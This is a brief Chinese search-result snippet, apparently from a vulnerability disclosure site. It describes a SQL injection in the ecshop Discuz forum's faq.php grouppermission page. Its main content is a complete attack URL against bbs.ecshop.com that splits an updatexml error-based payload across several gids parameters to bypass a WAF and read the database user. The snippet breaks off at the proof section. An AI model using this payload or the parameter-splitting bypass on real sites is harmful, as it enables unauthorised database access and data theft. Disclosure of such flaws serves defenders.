1 matches found
ecshop_dz论坛注入可以绕过WAF
简要描述: 注入不是亮点,亮点在于绕过waf,专业绕waf,30年。 详细说明: 利用DZ本漏洞的特性,拆开sql语句。 http://bbs.ecshop.com/faq.php?action=grouppermission&gids99=%27&gids1000= and 1=updatexml1,concat0x5e24,/ &gids1010=/select user/ &gids1020=/,0x5e24,1%23 漏洞证明:...